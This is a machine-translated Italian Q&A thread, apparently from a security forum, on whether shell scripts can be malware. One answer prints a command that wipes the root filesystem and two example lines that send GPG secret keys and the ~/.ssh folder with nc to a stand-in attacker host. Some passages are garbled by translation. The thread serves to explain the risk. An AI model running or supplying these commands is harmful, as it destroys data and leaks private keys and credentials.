Un file .sh può essere un malware?

15

Un file .sh può essere un virus o qualcosa di dannoso? È come .exe file su Windows? Se sì, qualcuno può leggere questo script e dirmi se è sicuro ed è efficace sulla sicurezza di GnuPG? Mi dà la possibilità di crittografare i file con un clic destro su Ubuntu.

    
posta rezx 02.06.2012 - 23:39
fonte

5 risposte

39

.sh file sono shell script. Sono analoghi ai file .bat (script cmd ) in Windows. Tutti questi (script di shell, script cmd,% eseguibili di Windows di% jde, eseguibili di Linux (che di solito non hanno estensione)) sono programmi eseguibili; se ne esegui uno, può fare qualsiasi cosa tu possa fare. Quindi sì, gli script di shell possono essere dannosi. Tratta uno script di shell (o uno script Perl, o uno script Python, o uno script Ruby, ecc.) Con lo stesso sospetto che potresti trattare con qualsiasi altra applicazione.

È un po 'più difficile nascondere il malware in uno script di shell senza sembrare sospetto, perché si tratta di uno script che può essere letto da persone con conoscenza del linguaggio di scripting. Ma non è molto più difficile; poche persone, anche con le conoscenze tecniche, si preoccuperebbero di rivedere il codice, quindi potresti sperare di passare inosservato.

In pratica, c'è meno malware per Linux che gira intorno a Windows. Ciò è probabilmente dovuto principalmente al fatto che Linux ha una quota di mercato molto inferiore rispetto a quella di Windows sul desktop, quindi il recupero per la scrittura di malware Linux è inferiore. Inoltre, esiste una cultura a lungo radicata nel condividere piccoli miglioramenti al sistema nel mondo Linux, più che nel mondo Windows; quindi l'equilibrio delle probabilità dice che si tratta di qualcuno che condivide un piccolo miglioramento e non un malware. Ma potrebbe essere il malware a rappresentare un piccolo miglioramento. Alla fine, devi decidere se puoi fidarti del sito in cui stai ricevendo questa applicazione o delle persone che hanno consigliato questo sito. Favorisci i programmi che provengono dalla tua distribuzione (ovvero che puoi installare dal centro software), poiché sono stati sottoposti a revisione.

Ora riguardo a questo programma specifico: ho avuto un rapido sguardo, e sembra benigno. Non ho visto nulla che memorizzasse la tua password ovunque senza dirlo o che avrebbe fatto cose sul tuo computer oltre a ciò che è pubblicizzato per fare. Nota che ho fatto solo una revisione di 2 minuti, che ogni autore di malware in remoto potrebbe superare. Il programma sembra abbastanza ben scritto.

Non consiglierei assolutamente questo programma a meno che tu non senta un bisogno urgente che non è affrontato dai pacchetti nella distribuzione di Ubuntu. Ubuntu viene fornito con il cavalluccio marino frontendGUIperGPG(c'èanche kgpg pergliutentidiKDE).Puoiancheinstallare seahorse-nautilus (o cavalluccio marino -plugin nelle versioni precedenti) per l'integrazione con Nautilus.

    
risposta data 03.06.2012 - 00:06
fonte
8
#!/bin/sh
rm -rf --no-preserve-root /

Questo è malware, ed è uno script di shell. Una versione più avanzata potrebbe includere qualcosa come:

gpg --export-secret-keys | nc www.evilbadguys.com 443
tar -cz ~/.ssh | nc www.evilbadguys.com 80

Quindi sì, uno script di shell può essere dannoso. Può diventare più complesso e richiedere altri linguaggi di scripting, librerie o persino un archivio di shell che sputa e chiama un eseguibile regolare.

Per la maggior parte, qualsiasi cosa tu esegua ottiene i permessi dell'utente.

    
risposta data 04.06.2012 - 22:04
fonte
2

Certo! Può fare qualsiasi cosa tu possa fare! Guarda i registri, ti registro, rubi i file ecc ....

A seconda di ciò che il suo sviluppatore ha scritto sul codice sorgente! Può fare QUALCUNO .....

Ed è molto facile da fare, quindi se ti viene inviato un file .sh sospetto, pensaci due volte prima di eseguirlo!

    
risposta data 03.06.2012 - 23:52
fonte
2

Un file sh può essere un virus infetto da file tradizionale:

Entrambi gli articoli includono codice sorgente per virus (più vecchi), anche se uno o entrambi hanno un errore di battitura che impedisce loro di funzionare correttamente oggi. È una soluzione facile, come ricordo. Entrambi gli articoli sono apparsi in ritardo, lamentati

Sistemi informatici Volume 2, Numero 2, Primavera, 1989

Questo è quasi 25 anni fa.

In una vena leggermente diversa, i worm di rete VAX / VMS Babbo Natale e WANK sono stati entrambi scritti nel linguaggio VMS "shell script", DCL.

    
risposta data 04.06.2012 - 17:54
fonte
1

Uno script di shell Unix può essere un virus, un worm, un cavallo di Troia, uno spyware, una bomba logica

Se uno script di shell è eseguito da un account privilegiato, in particolare root o adm , allora questo script di shell può causare qualsiasi tipo di danno. Può fermare il sistema, rimandare tutte le e-mail a qualsiasi tipo di comando host, cambia la tua macchina Unix in un'arma Denial of Service, e molto peggio ...

La maggior parte di questo cattivo comportamento sarà facilmente scoperta da un'analisi seria di uno script di shell. Quindi il fatto che uno script di shell sia un'arma non rimarrà segreto.

Perché lo script di shell non viene usato più spesso per distruggere tutte le caselle di Unixes? Semplicemente perché i loro utenti non lavorano sul loro sistema operativo con lo stesso livello di privilegi.

  • La maggior parte degli utenti Unix, anche sysadmin, mai lavorare sul loro sistema, anche il loro personale, registrato come admin .
  • La maggior parte degli utenti di Windows, anche non sysdamin, lavora sempre sul loro sistema, anche uno professionale, registrato come admin .

I 2 script di shell che hai proposto di utilizzare non mostrano alcun uso di pericoloso comandi. Non fanno alcun tipo di home call , non ne nascondono nessuno porta sul retro del sistema. Ma raccolgono la tua password utente all'interno di una variabile $PASS in modo da poter utilizzare sudo senza chiedere la password ogni volta. Chiunque sul tuo sistema può vedere attraverso l'uso corretto di ps argomenti il valore di questa variabile di ambiente shellne ie la tua password. Successivamente, qualsiasi altro utente del tuo sistema può utilizzare il tuo account e aquire root privilege attraverso sudo . Quindi non ti consiglierei di usare un tale tipo di script di shell.     
risposta data 03.06.2012 - 01:11
fonte

Leggi altre domande sui tag